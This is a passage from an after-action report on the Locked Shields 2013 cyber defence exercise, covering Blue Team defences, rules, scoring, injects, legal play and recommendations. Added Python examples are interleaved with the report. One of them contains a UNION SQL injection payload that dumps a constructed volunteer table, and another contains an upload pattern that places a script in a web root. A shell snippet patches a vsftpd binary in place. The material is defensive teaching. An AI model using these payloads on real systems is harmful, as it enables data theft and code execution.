# patch bytes: 13 bytes of replacement code followed by NOPs (0x90)
echo -ne '\x24\x04\xd6\x15\x06\x08\xc7\x04\x24\xd1\x15\x06\x08\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90' > /tmp/vsftpd.containment
cp /usr/sbin/vsftpd /tmp/vsftpd.tmp
cp /usr/sbin/vsftpd /usr/sbin/vsftpd.backup
# overwrite the bytes at file offset 88240 in place; conv=notrunc keeps the rest of the file
dd if=/tmp/vsftpd.containment of=/tmp/vsftpd.tmp bs=1 seek=88240 conv=notrunc
/etc/init.d/vsftpd stop
cp /tmp/vsftpd.tmp /usr/sbin/vsftpd
/etc/init.d/vsftpd start
Note that the offset and the patch bytes are specific to that exact vsftpd build; on any other binary the same dd command would corrupt unrelated code.
Using a workaround to block the backdoor in UnrealIRCd (BT9). BT9 was unable to download the updated package for UnrealIRCd. They discovered that the trigger payload contains the string "AB" and decided to try out a workaround to drop the respective packets. The service check for IRC was just a TCP ping, so we are not aware of how much functionality this broke. From RT's perspective the service appeared as "patched":
iptables -A INPUT -m string --string "AB" --algo bm -s <prefix>/18 -j DROP
As written, the rule is not restricted to the IRC port or protocol, so any packet from that range carrying those two bytes anywhere in its payload is dropped.
Installing database specific security solutions such as GreenSQL (BT4).
Deploying a central password management system (BT10).
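The UNION-based SQL injection from the WEB team's attack methods (section 4.5) and the BT8 sanitise() allow-list above, together with the O'Neal caveat, can be put side by side in one runnable example. This is added code, not from the report or from the exercise's web application: it rebuilds the three behaviours in Python against an in-memory SQLite database, with a port of the PHP allow-list, the string-built query it was protecting, and the parameterised query that the caveat points towards. The table layout, column names and volunteer records are constructed for the example, and the UNION payload is adapted to that constructed schema (one selected column, so one column in the UNION).

```python
"""The web portal's SQL injection and BT8's sanitise() fix, side by side.

Added example for this section; it is not code from the report or from the
exercise's web application. It rebuilds, in Python with an in-memory SQLite
database, the three behaviours discussed on the page: the UNION-based SQL
injection used by the WEB team, an allow-list sanitiser equivalent to BT8's
PHP sanitise() (which strips the apostrophe from O'Neal), and the fix the
caveat points towards: type checks plus parameterised queries.
Table layout, column names and volunteer data are constructed.
"""
import re
import sqlite3

ALLOWED = r"a-zA-Z0-9 \-_()šŠ,žŽõüäöÕÜÄÖ"  # mirrors the PHP allow-list pattern


def sanitise(value):
    """Python port of the allow-list filter: every character outside ALLOWED is
    deleted. It blocks quote-based injection but also mangles legitimate input."""
    return re.sub(f"[^{ALLOWED}]", "", value).strip()


def build_db():
    """In-memory copy of the two tables the example needs (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE resources (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO resources VALUES (1, 'Water sanitisation'), (2, 'Food distribution');
        CREATE TABLE volunteers (id INTEGER PRIMARY KEY, firstname TEXT,
                                 lastname TEXT, blood_type TEXT);
        INSERT INTO volunteers VALUES (1, 'Mari', 'Maasikas', 'A+'),
                                      (2, 'Sean', 'O''Neal', 'O-');
        """
    )
    return conn


# A UNION payload of the kind the WEB team sent in resource_id, adapted to the
# constructed schema; group_concat packs the whole volunteers table into one row.
UNION_PAYLOAD = ("0 UNION SELECT group_concat(firstname || '|' || lastname || '|' "
                 "|| blood_type, ';') FROM volunteers")


def resource_title_unsafe(conn, resource_id):
    """The original pattern: the request parameter is pasted into the SQL text."""
    row = conn.execute("SELECT title FROM resources WHERE id = " + resource_id).fetchone()
    return row[0] if row else None


def resource_title_safe(conn, resource_id):
    """Fix: reject anything that is not an integer, then bind it as a parameter."""
    try:
        rid = int(resource_id)
    except ValueError:
        return None
    row = conn.execute("SELECT title FROM resources WHERE id = ?", (rid,)).fetchone()
    return row[0] if row else None


def volunteers_by_lastname_unsafe(conn, lastname):
    """String-built query: breaks on a legitimate apostrophe and is injectable."""
    sql = f"SELECT lastname FROM volunteers WHERE lastname = '{lastname}'"
    return [r[0] for r in conn.execute(sql)]


def volunteers_by_lastname_sanitised(conn, lastname):
    """BT8-style fix: filter first, then concatenate. O'Neal becomes ONeal."""
    return volunteers_by_lastname_unsafe(conn, sanitise(lastname))


def volunteers_by_lastname_safe(conn, lastname):
    """Parameter binding: the apostrophe is data, never SQL syntax."""
    sql = "SELECT lastname FROM volunteers WHERE lastname = ?"
    return [r[0] for r in conn.execute(sql, (lastname,))]


def unsafe_search_breaks(conn, lastname):
    """True when the string-built query does not even parse for this input."""
    try:
        volunteers_by_lastname_unsafe(conn, lastname)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = build_db()
    print("leaked via UNION:", resource_title_unsafe(db, UNION_PAYLOAD))
    print("same input, safe query:", resource_title_safe(db, UNION_PAYLOAD))
    print("sanitised O'Neal lookup:", volunteers_by_lastname_sanitised(db, "O'Neal"))
    print("parameterised O'Neal lookup:", volunteers_by_lastname_safe(db, "O'Neal"))
```

The sanitised lookup returns nothing for Mr O'Neal because his name no longer matches the stored value, which is the caveat above in executable form; the parameterised version finds him and, given the UNION payload, returns nothing rather than the volunteer table.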
Sandboxing applications, especially web browsers (Sandboxie) (BT5).
Encrypting communication between servers (IPsec) (BT2).
Using hosts3d for traffic visualisation (BT4).
Custom scripts for monitoring process execution and new connections, blocking users and checking for changes (BT8).

Using honeypots (BT4, BT8). The problem with this solution is that for LS exercises the Red Team has always used a white-box approach: the initial network is completely known to the Red Team members, they are interested in attacking specific services, and they do not have to scan the networks for new targets. It is still possible to redirect services to different IPs (at least BT4 used this method) and hope that the Red Team is using addresses instead of DNS names. There is a rumour that one bad guy spent more than an hour in a honeypot before figuring out that this was not the right place to be. However, afterwards no one was brave enough to admit that it was them.

5.6 Questionable or Forbidden Practices
The rules for LS13 were relatively complex. Keeping the rules simple is challenging, as the Blue Teams always ask very specific questions regarding what they are and are not allowed to do. At the same time, more complex rules are difficult to enforce. Many activities conducted by the Blue Teams were either directly prohibited or on the borderline:
Encrypting and password protecting sensitive files. These in fact contained the hash values that the Red Team had to obtain as proof of a successful attack. From the users' (blondes') perspective this meant that they suddenly found that all their important documents had been encrypted by the IT department.
Removing functionality or blocking access to the functionality of web applications. For instance, dynamic pages were replaced with static pages. The automatic availability checks were simple and did not catch such modifications.
Making workstations unusable:
Installing 2 different AVs on the same machine so that they consumed all resources.
Constantly scanning the full file system of the workstations with AV.
Administrator constantly logged in.
Observing the activities of the blondes over VNC and killing the browser after the first attempt to download a file (this would not be possible in a real-life engagement where one would have to protect hundreds of workstations instead of just 12).
- Patching systems that they were not allowed to patch.
- Blocking downloads of all kinds of files, including zip containers.
- Blocking the use of Java.
- Limiting the POST request size so that only simple transactions were possible (such as login).
- Blocking access to the websites after the first request or after a few seconds from the initial packet exchange.

5.7 Security Software on Windows Systems

Team | Software | Remarks
BT1 | Microsoft Security Essentials |
BT2 | Kaspersky Anti-Virus 2013; Malwarebytes Anti-Malware 1.75; Avast Free Antivirus 8.0 (DCs and WS4) | 2 different AV products on some VMs
BT3 | McAfee VirusScan Enterprise 8.8 and McAfee Agent |
BT4 | ESET Endpoint Security; NSClient++; OSSEC HIDS 2.7 |
BT5 | McAfee VirusScan Enterprise 8.8 and McAfee Agent 4.6; Malwarebytes Anti-Malware 1.75; Sandboxie 3.6; ADManager plus 6.0 and Specops Gpupdate Professional 2.1 (on DCs); EMET |
BT6 | Microsoft Security Essentials |
BT7 | ESET Smart Security 6.0; McAfee VirusScan Enterprise 8.8 and McAfee Agent 4.6; Avast Free Antivirus 8.0; OSSEC HIDS; EMET 4.0 beta |
BT8 | Microsoft Security Essentials; Malwarebytes Anti-Malware 1.75; Snare 4.0 |
BT9 | F-Secure Client Security 10.0; EMET 4.0 beta; F-Secure Anti-Virus for Windows Servers Version 9 |
BT10 | Symantec Endpoint Protection |

Two further rows of the table carried the remark "2 different AV products on some VMs". Clam AntiVirus was typically installed on the Linux workstations.

5.8 Information Sharing

Shared XMPP (Jabber)-based chat was the main communication channel for the Blue Teams. Straight after the game began, one team started to alert others to specific vulnerabilities using chat messages. As other Blue Teams joined to share their findings and countermeasures, the channel was quickly overloaded. In addition, many of the messages were too generic and therefore useless to the others ("we have closed the firewall", "local users disabled", "we discovered a weak password on help.aid5.ex"). As a result, teams were not able to follow or use the information. Backdoors and vulnerabilities that were reported on chat, and for which in some cases custom patches had also been shared, were still successfully exploited by the Red Team many hours after the information first appeared. Some findings were reported several times by different Blue Teams.

We would have expected that information of a more static nature would have been placed on a shared wiki. The collaboration environment was already set up by the organisers, so it didn't require any additional effort. Blue Teams could have structured the information by creating a list of all individual systems followed by all found issues. Links to vulnerability reports could have been shared on the chat channel instead of the content of the reports themselves. The teams were under heavy pressure and unfortunately no-one was willing to put in additional effort to initiate better and more structured data exchange.

5.9 Scores

The top 3 teams in the scoreboard were:

1. Blue Team 5
   - Best score in availability and SLA bonus, incident reporting, and SITREP. A bonus was assigned for information sharing.
   - Second best in preventing Red Team attacks and responding to injects.
   - Did not use VM reverts.
   - Only team who placed their own IPS/firewall inline in front of both the MIL and Aid side.
   - Applied proscribed tactics such as replacing dynamic web pages with static ones.
2. Blue Team 8
   - Best team in responding to injects (media). Second best in writing SITREPs.
   - Otherwise good availability score was impacted by using an RBL and therefore accidentally blocking the scoring bot.
   - Only team who quickly mitigated the BGP hijacking attack.
   - Did not use VM reverts.
3. Blue Team 2
   - Second best in availability and SLA bonus, and awarded a special score (was considered to be the most cooperative Blue Team).
   - Average results in other categories.

(Figure: score chart for BT5, BT8 and BT2.)

6 Injects

6.1 Scenario Injects

Seven so-called scenario injects were defined:

1. Following the news. Blue Teams had to publish a link to the Locked Shields News portal on one of their own web sites. The aim was to emphasise the existence of the portal and get Blue Teams to follow the news.
2. Redundant infrastructure. Blue Teams had to cooperate with neighbouring Blue Teams and configure their MIL-side BGP routers to provide transit to each other.
3. Intel update. Information provided to the Blue Teams about the involvement of an international hacker group.
4. Adversary assessment. Blue Teams were requested to write a short report about the adversaries behind the cyber attacks by answering questions such as who they were, how many there were, how capable they were, and what their motivation and goals were.
5. Mortar attack on MIL site. Information to the Blue Teams that a grenade was thrown into the server room container of the MIL networks, resulting in the destruction of the TV tower computer. The backups were old. In reality, their VMs were just reverted to the initial vulnerable state.
6. Abuse report. Coalition CERT had received an abuse report that one of the Blue Team's websites ( ) was hosting malware. Blue Teams were tasked to verify this and report the results in 30 minutes. Before this inject went out, the Red Team tried to compromise those sites and use them to conduct a watering hole attack. Some Blue Teams reported about the malware they had found even though the Red Team could not accomplish the task.
7. Adversary assessment. Blue Teams had to provide an update about the adversary.

The scored injects together with the best responses have been covered more thoroughly in Annex IV: Scenario Injects.

6.2 Media Injects

The aim of the media simulation was to illustrate the exercise with news from the real world and add pressure to the Blue Teams with injects other than Red Team activities. The media simulation cell sent each Blue Team about 2 messages and called them once during each phase. There were a few dynamic activities responding to Blue Team messages and asking further questions. Pressure on the issue of hacking back was not originally planned but turned out to be a good topic for adding stress to the Blue Teams.

A total of 25 news stories were published in the Locked Shields News portal during the exercise. The stories included background information about the situation on the island, reports on on-going incidents, comments from victims and comments from Blue Teams, but also pure lies, twisted words, unchecked facts, etc. Examples of the news stories can be found in Annex V: Examples of News Stories.

6.3 Legal Injects

Legal injects have been summarised in Section 7: Legal Play, and the details with example answers can be found in Annex VI: Legal Injects.

7 Legal Play

7.1 Introduction

This year, legal play was set up so that there was at least one legal advisor on each Blue Team. The training objectives for them were as follows:

1. To have the legal advisors analyse the complex legal issues arising in the context of an armed conflict;
2. To facilitate communication between the legal and technical experts;
3. To educate the legal experts about IT;
4. To an extent, to educate the technical experts about the law.

7.2 Injects

To meet the training objectives, eight injects were prepared for the legal advisors, four for each exercise day:

1. Each morning the legal advisors were asked to brief their Blue Teams about the applicable law, their legal status, rights and obligations. The goal was twofold: to give the technical experts on the Blue Teams some idea of the body of relevant law and how it applies to their operations, and at the same time to require the legal advisors to prepare the briefings under time pressure while being forced to avoid legalese and make it understandable to a non-legal audience, as is the case in real operations;
2. To answer questions coming from the chain of command, which required a deeper legal analysis;
3. To communicate with the media as well as react to stories published by the media, with the goal of addressing complex legal issues, refuting false statements and interpretations, and at the same time making their positions and explanations understandable to the layperson;
4. In the form of a quiz, to answer questions about information technology to facilitate a better understanding of it by the legal advisors.

7.3 Team Setup

On the organisers' part, there were three lawyers on the White Team. They were responsible for planning and executing the legal injects as well as scoring the players' responses. In hindsight, three lawyers on the White Team was an optimal number; however, scoring the responses from ten Blue Teams kept us working under rather heavy time pressure, and therefore next year having four lawyers on the White Team should be considered. To be able to fairly and thoroughly assess the responses from Blue Teams, the lawyers on the White Team need to have a deep understanding of the legal areas involved, and therefore it will remain a good idea to bring in at least one external expert in 2014 and plan for the budget accordingly.

7.4 Feedback on Execution

The reactions to the legal play from the Blue Teams were positive. The exercise kept the legal advisors busy throughout the two days, with naturally those providing more thorough answers having been under heavier time pressure, but in most cases also earning more points. The most common feedback was that legal advisors would have appreciated getting substantive feedback on their answers, and not only expressed in the scores that were given. As sample answers can be developed prior to the exercise and shared with the Blue Teams immediately after, this can and should be facilitated in the next Locked Shields. This would also enable being more transparent with regard to the points awarded. However, to share some insight into this year's scoring, annexed to this report are the highest scored responses to each inject (excluding the technical quizzes).

7.5 Results

The fact that the scores allocated for the actions of legal advisors counted towards the overall scores of the Blue Teams seems to have motivated the technical experts on the Blue Teams to cooperate with and assist the legal advisors. While the legal play in 2013 was a pilot activity, and therefore the points that could be earned for it were modest, for the exercise in 2014 allocation of a larger portion of the overall possible score for a Blue Team should be considered. As for Locked Shields 2013, the final scores of the best Blue Teams in legal aspects were the following:

1. Blue Team points
2. Blue Team points
3. Blue Team points

As the majority of injects were centred on the law of armed conflict, those legal advisors with expertise and experience in this area naturally received the best scores. However, those legal advisors who were not law of armed conflict experts should be complimented for their efforts in a fairly unknown field of law. As can be seen in the annexed responses, sometimes they were able to point to interesting aspects that the law of armed conflict experts were not (see, for example, Blue Team 10's response to Inject 2, Day 2). As for Locked Shields 2014, ideally the participating legal advisors will have similar backgrounds, especially if the score percentage is raised; but if, like last year, this is not feasible, it is more important that each Blue Team should have at least one legal advisor on it. Descriptions of injects and a selection of answers can be found in Annex VI: Legal Injects.

8 Recommendations to the Blue Teams

In this section we have provided a few remarks to the Blue Teams on how we think they could improve.

8.1 Protecting Web Applications

1. Overall, the best defence is of course to fix configuration mistakes and vulnerable code. Good monitoring and quick reaction also did the trick in the context of the exercise for most of the teams. Naturally, this works only if the alerts are well automated to reduce manual overhead.
2. Simple blocking, wrong or insufficient configuration changes, and breaking application functionality by replacing dynamic content with static pages is not the way to go. In many teams, though, it was obvious that some defences and blocks that were put in place were not that effective against the attackers, but would have infuriated legitimate users. These methods may help to gain more points as our automatic scoring system does not have proper functionality checks. However, we believe that only limited training benefit will be gained by practising such techniques.
3. The main web application vulnerabilities that remained without the required attention were:
   a. Write permissions for the public directories enabled.
   b. File uploads into publicly accessible directories allowed; therefore attackers can upload and execute their own code.
   c. SQL injection vulnerabilities not fixed.
   d. Directory listing enabled.
   e. Template files, source code, database scripts, etc. left in the public directory.
   f. Cross-Site Request and Cross-Site Request Forgery vulnerabilities not fixed.
4. Notes on Web Application Firewalls (WAFs): As a rule, WAFs did not really present a major obstacle either in LS12 or in LS13. Generally, WAFs are not very effective tools against flexible approaches by an attacker. WAFs would often be effective against attacks targeting web application users, such as XSS. These attacks were not performed by the Red Team as legitimate web users were not simulated in this exercise. Some simple web attacks repeatedly worked well no matter whether a WAF was implemented or not:
   - File upload (PHP shell) into publicly accessible folders. Some defences, such as denying directory listings for upload folders, did not matter as long as access to the uploaded files was not denied. Good defence would have been proper configuration changes and ensuring that only proper file types were permitted to be uploaded.
   - The pre-planted backdoor (e.g. in the body count server) used only AJAX and POST requests without any parameters in the URL. If WAF detection was relying on URL parameters, it would fail to detect any malicious traffic. It is important to log and analyse the body of POST requests. From the after action feedback we learned that, for example, BT8 essentially looked into all web traffic and also POST parameters. Such close monitoring is not always a viable approach, but BT8 planned and built up very effective and thorough monitoring approaches.
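The upload weakness described above comes down to three controls that a WAF cannot substitute for: validate the file's content rather than its name, give the stored file a name the client did not choose, and keep it where the web server will never execute it. The Python below is an added example written for this report's readers; it is not code from the exercise, from any Blue Team, or from the body count application. The directory layout, the PNG-like bytes and the `media.php.png` sample are constructed for the demonstration, and `vulnerable_save` reproduces only the "upload into a served folder" pattern the text criticises.

```python
import os
import secrets
import tempfile
from typing import Tuple

# Allow-list: claimed extension -> leading bytes the content must actually carry.
ALLOWED_TYPES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".pdf": b"%PDF-",
}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024


class UploadRejected(ValueError):
    """Raised when an upload fails validation."""


def vulnerable_save(web_root: str, filename: str, data: bytes) -> str:
    """'Before' pattern: trust the client's file name and write it into a
    directory the web server serves (and, for .php, executes). Denying directory
    listings on 'uploads' does not help; the uploader already knows the name."""
    dest = os.path.join(web_root, "uploads", os.path.basename(filename))
    os.makedirs(os.path.dirname(dest), exist_ok=True)
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest


def check_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Decide whether an upload is acceptable; returns (ok, reason)."""
    if len(data) > MAX_UPLOAD_BYTES:
        return False, "file too large"
    # Only the last extension counts: 'media.php.png' claims PNG and must prove it.
    ext = os.path.splitext(filename)[1].lower()
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        return False, f"extension {ext!r} not allowed"
    if not data.startswith(magic):
        return False, "content does not match claimed type"
    # Cheap polyglot check: a valid image header followed by a PHP open tag is
    # still an image to the browser but a script to a mis-mapped handler.
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded script marker"
    return True, "ok"


def hardened_save(store_root: str, filename: str, data: bytes) -> str:
    """'After' pattern: validate, assign a random name, store outside the web
    root. A download handler (not shown) then streams the file back with a
    fixed Content-Type and Content-Disposition: attachment."""
    ok, reason = check_upload(filename, data)
    if not ok:
        raise UploadRejected(reason)
    os.makedirs(store_root, exist_ok=True)
    ext = os.path.splitext(filename)[1].lower()
    dest = os.path.join(store_root, secrets.token_hex(16) + ext)
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest


def demo() -> dict:
    """Run both paths on constructed inputs in a temporary directory and report
    where each file ended up (nothing here touches a real web server)."""
    base = tempfile.mkdtemp()
    web_root = os.path.join(base, "htdocs")              # served by the web server
    store_root = os.path.join(base, "uploads-private")   # never served directly
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32            # constructed PNG-like sample
    shell = b"<?php /* constructed stand-in for an uploaded script */ ?>"

    result = {}
    vuln_path = vulnerable_save(web_root, "media.php.png", shell)
    result["vulnerable_inside_webroot"] = vuln_path.startswith(web_root)

    good_path = hardened_save(store_root, "photo.png", png)
    result["hardened_inside_webroot"] = good_path.startswith(web_root)
    result["hardened_renamed"] = os.path.basename(good_path) != "photo.png"
    try:
        hardened_save(store_root, "media.php.png", shell)
        result["shell_rejected"] = False
    except UploadRejected:
        result["shell_rejected"] = True
    return result


if __name__ == "__main__":
    print(demo())
```

The content check is deliberately the second line of defence: even if a polyglot slips through, a random name under `uploads-private` is never resolved by the web server, so there is nothing for a request to execute. Keeping `uploads/` inside the web root and relying on the WAF to spot the request is exactly the configuration that kept working for the Red Team in both LS12 and LS13.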

8.2 Protecting Other Parts of the Infrastructure

1. To hijack the Blue Teams' network traffic, the Red Team started to advertise BGP routes of some of the Blue Team networks as /26 prefixes. A quick and short-term mitigation of that attack would be to announce more precise routes yourself, for instance two /27 prefixes.
2. Pass-the-Hash worked in several Blue Team networks. Microsoft has published a thorough paper on the subject: Mitigating Pass-the-Hash Attacks and Other Credential Theft Techniques.
3. Central monitoring of file changes and central logging proved to be essential.

8.3 Reporting and Information Sharing

Introduction

Information sharing between the Blue Teams was not as efficient as expected. Probably, this was mainly caused by the fact that there was competition between the Blue Teams. On one hand, they were motivated to share information (sometimes too much) as this provided them with a way to gain points. On the other, the teams may have filtered out some data or delayed sharing findings in order to gain advantage over their opponents.

Yellow Team Feedback for the Blue Teams

Below, we explain how your efforts can make information sharing and situation awareness better and workflows more effective. This feedback is meant especially for the teams that didn't do so well on the incident reporting side.

Shared Understanding of Information Sharing Goals

First rule: think about why you are reporting. Once we have a shared understanding of 'why', we will work better together. The goal of the information sharing is to provide information that:

a. others can use to protect themselves; and
b. provides situational awareness to HQ so that they can make hard decisions if necessary. For instance, to discontinue an operation because the related IT system cannot be trusted anymore, or to send help, etc.

When reporting, please keep in mind that the receiving end has to understand what you are saying. A small modification to your wording can make a big difference (see examples below). Sometimes it looked as though you just wanted to give out the message that you were doing something. Admittedly that is something worth knowing, but the Yellow Team had that information already from stress reporting, so incident reports should have had more content. Furthermore, some teams seemed to report whatever their IDS system was reporting. That is a job for automation. With incident reports, we are looking for human insight.

Examples

Below, we give some examples of useful and useless information. Useless information could be turned into useful information by providing additional details.

Useful information:

#bt4_js_backdooraccess_004 zone=aid_dmz We have detected php backdoor access on the counting.aid4.ex web server. Source IP  Access was unsuccessful, dropped by WAF. status=close Additional data: URL:/bodycount/lib/images/media.php.png

This short message is useful in many ways:

- We know that there is a backdoor in a certain server, in a certain zone of BT4's network.
- We know that no immediate and potentially drastic actions are required, as the defending team is on top of it.
- We know the source of the attack. We can share this information with other defenders so that a) they can monitor activity from that address and b) we are able to identify that, if there are other compromises from the same address, potentially the same group is behind the attack.

Not so useful information:

#infra500 Misc. Workstation detected zone=mil tag=int status=open
#infra500 workstation with address not traceable anymore status=close

This directs HQ staff to speculate and spend time contacting you for further information. We would not like to jump to the conclusion that this report was irrelevant: you reported it, and thus it should be important. Below, we run an example speculation chain to give you some idea of the result of a report which does not have sufficient information.

- Why should this have been reported? The first guess is simple: there should not be (undocumented?) workstations appearing and disappearing in this zone. But that is just a guess. Did the workstation perhaps do something suspicious (or you don't know)?
- A workstation disappearing does not mean that the problem is solved. So we wonder, why did you close the status? Even a comment "we don't have time to investigate further" would give some closure to the report. Why was it closed without further investigation? Perhaps you did investigate the case and deduced that it was just an employee laptop connected to the wrong network?

The bottom line is that we don't know and we need to spend time speculating or asking further questions. Spending an additional 30 seconds on the reporting phase could save 5-20 minutes of time for the HQ staff.

Conclusions

Defensive teams should keep to the basic principles of more effective information sharing, which tend not to be followed in high stress situations:

a. Long messages with a lot of details should not be shared on a chat channel. Rather, the detailed information should be stored on a web portal such as a wiki, and a link should be shared over the chat.
b. Every team should appoint an information management officer who tracks the dynamic messages on chat and contributes to giving that data a more structured and usable format.
c. The chat channel must be kept clean of messages that are useless to other teams. Abstract notes such as "close the firewall" or "we found vulnerabilities from site X, fix the code" do not help anyone.

8.4 Media Response

The fact that all Blue Teams responded to media requests was a significant improvement on previous years. More points could have been received for contacting the journalist and reacting to false information, claims and speculation published in the portal. Also, there was relatively little initiative (press announcements, interview offers, story proposals) shown by BTs in terms of public relations. BT8 received the highest score from the media team because of their furious attempts to address false information in the portal and their proactive attitude towards the media.
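Returning to the BGP point in 8.2 above: the reason two /27 announcements beat a hijacked /26 is longest-prefix match, and the same rule cuts both ways, because the hijacker can answer with /28s. The Python below is an added example, not code or routing data from the exercise; it models a routing table as a list of (prefix, origin) pairs, and the 10.40.0.0/24 block and team labels are constructed for illustration.

```python
import ipaddress
from typing import Iterable, List, Optional, Tuple

Route = Tuple[str, str]  # (prefix in CIDR notation, origin that announced it)


def best_route(rib: Iterable[Route], address: str) -> Optional[str]:
    """Origin of the longest matching prefix for an address. This is how a
    router chooses the forwarding entry, regardless of who announced the
    covering aggregate or how long ago."""
    ip = ipaddress.ip_address(address)
    best_net, best_origin = None, None
    for prefix, origin in rib:
        net = ipaddress.ip_network(prefix, strict=True)
        if ip in net and (best_net is None or net.prefixlen > best_net.prefixlen):
            best_net, best_origin = net, origin
    return best_origin


def counter_announcements(hijacked_prefix: str) -> List[str]:
    """The two prefixes one bit longer than the hijacked one; together they
    cover it exactly and each wins longest-prefix match against it."""
    net = ipaddress.ip_network(hijacked_prefix, strict=True)
    return [str(sub) for sub in net.subnets(prefixlen_diff=1)]


def with_mitigation(rib: Iterable[Route], own_origin: str, hijacked_prefix: str) -> List[Route]:
    """RIB after the victim announces its more-specific routes."""
    return list(rib) + [(p, own_origin) for p in counter_announcements(hijacked_prefix)]


# Constructed scenario: BT4 owns 10.40.0.0/24; the Red Team announces 10.40.0.64/26.
BASE_RIB: List[Route] = [("10.40.0.0/24", "BT4"), ("10.40.0.64/26", "RT")]


def demo() -> dict:
    victim = "10.40.0.70"  # a host inside the hijacked /26
    mitigated = with_mitigation(BASE_RIB, "BT4", "10.40.0.64/26")
    # The hijacker's counter-move: go one bit longer again.
    escalated = mitigated + [("10.40.0.64/28", "RT")]
    return {
        "before": best_route(BASE_RIB, victim),
        "counter_prefixes": counter_announcements("10.40.0.64/26"),
        "after": best_route(mitigated, victim),
        "after_escalation": best_route(escalated, victim),
    }


if __name__ == "__main__":
    print(demo())
```

Two caveats for practice outside the game ISP: most transit providers drop IPv4 announcements longer than /24, so the more-specific trick has a hard floor on the real Internet, and as the `after_escalation` result shows it is only a race. The durable fix is that the upstream filters the bogus announcement (prefix filters, and a ROA so that the hijacker's origin fails validation), which is why the report calls this a quick and short-term mitigation.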
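The useful versus not-so-useful contrast in 8.3 above can be made mechanical: a small checker that parses the loose `#tag key=value free text` shape of the exercise reports and lists the questions HQ would otherwise have to ask. The Python below is an added example written for this report; it is not a Yellow Team tool. The sample reports are constructed after the ones quoted above, and the source address 192.0.2.10 is a documentation-range placeholder because the page does not give the real one.

```python
import re
from typing import Dict, List

# Patterns for the loose report format used on the exercise chat.
TAG_RE = re.compile(r"^#(\S+)")
KV_RE = re.compile(r"\b(\w+)=(\S+)")
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# A dotted host name not sitting inside a URL path (no '/', '.' or word char before it).
HOST_RE = re.compile(r"(?<![/\w.])[a-z0-9-]+(?:\.[a-z0-9-]+)+\b", re.I)
# Words that tell HQ what happened or what was done about it.
OUTCOME_WORDS = ("successful", "unsuccessful", "dropped", "blocked", "patched",
                 "removed", "disabled", "isolated", "reverted", "false positive",
                 "no time")


def parse_report(text: str) -> Dict[str, object]:
    """Pull out the report id, key=value fields, hosts, source addresses and
    whether any outcome/action statement is present."""
    tag = TAG_RE.search(text.strip())
    fields = dict(KV_RE.findall(text))
    ips = IPV4_RE.findall(text)
    hosts = [h for h in HOST_RE.findall(text) if not IPV4_RE.fullmatch(h)]
    lowered = text.lower()
    return {
        "id": tag.group(1) if tag else None,
        "fields": fields,
        "source_ips": ips,
        "hosts": hosts,
        "outcome_stated": any(w in lowered for w in OUTCOME_WORDS),
    }


def assess_report(text: str) -> List[str]:
    """Return the gaps HQ would have to chase; an empty list means usable."""
    r = parse_report(text)
    gaps: List[str] = []
    if r["id"] is None:
        gaps.append("no report id (#tag) to refer back to")
    if "zone" not in r["fields"]:
        gaps.append("missing zone= (which part of the network?)")
    if not r["hosts"]:
        gaps.append("no affected host named")
    if not r["source_ips"]:
        gaps.append("no source address (nothing for other teams to watch for)")
    status = r["fields"].get("status")
    if status == "close" and not r["outcome_stated"]:
        gaps.append("closed without saying what happened or why it was closed")
    elif not r["outcome_stated"]:
        gaps.append("no statement of impact or action taken")
    return gaps


# Constructed samples modelled on the report's examples.
USEFUL = ("#bt4_js_backdooraccess_004 zone=aid_dmz We have detected php backdoor access on the "
          "counting.aid4.ex web server. Source IP 192.0.2.10. Access was unsuccessful, dropped by WAF. "
          "status=close Additional data: URL:/bodycount/lib/images/media.php.png")
NOT_USEFUL_OPEN = "#infra500 Misc. Workstation detected zone=mil tag=int status=open"
NOT_USEFUL_CLOSE = "#infra500 workstation with address 192.0.2.55 not traceable anymore status=close"


if __name__ == "__main__":
    for sample in (USEFUL, NOT_USEFUL_OPEN, NOT_USEFUL_CLOSE):
        print(sample[:40], "->", assess_report(sample) or "usable")
```

An information management officer (conclusion b above) could run exactly this kind of check on each outgoing report and bounce the ones that come back with gaps; the 30 seconds spent filling them in is the saving the Yellow Team describes.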

9 Observations and Recommendations to Improve Locked Shields

9.1 Exercise Organisation

1. It should be determined whether it is possible to extend the actual gameplay from two to three or four days. There are many advantages. Firstly, when the offensive campaign is spread over more days, a greater variety of attack and defence scenarios can be played out. Secondly, the training audience would have more time to implement the techniques that they learn during the exercise, such as reporting. For LS13 there was a steep learning curve during the first 2 days and the Blue Teams never had time to actually use what they learned. There are also disadvantages: the cost of the exercise would increase, and LS13 is dependent on support from many partners and volunteers, for whom it may be difficult to find additional time. As an alternative, the need to spend all of Day 0 on preparations should be examined. The infrastructure is more stable and connectivity issues could be solved during the preparation days.
2. Two days of initial access to the environment before Execution and 30 minutes of RT ceasefire at the beginning of the game is enough to allow the BTs to raise security to an acceptable level. Preparation time should be decreased rather than increased. Network segments that are previously unknown to both Blue and Red Teams should also be introduced. BTs typically requested more preparation time. Nine out of ten teams replied that either the current allocation was OK or that more time was needed. One team proposed there should be less time, as for them the level of challenge was lower. For the BTs who tried to engage top-level experts from their country, it was difficult to get the people away from their posts for several days. From RT's perspective, BTs had too much time for preparation, and the minutes when they were not allowed to conduct any attacks were considered too long. Well prepared BTs had mapped their whole environment, created scripts for automated patching and could easily fix the most critical vulnerabilities during the first half an hour. In addition, BTs will just block the access until they have applied the most important safeguards. WT saw that 5 BTs started to cheat, which is also an indication that there was too much preparation time.
3. The number and length of planning meetings was sufficient. However, separate workshops should be planned to train and prepare RT members.
4. A proper exercise closing and awards ceremony should be planned. For LS13 this was basically non-existent. It felt like pulling the plug, with no closure. Long speeches are not required, but it would have been nice to at least show BTs the trophy that the winner will get.
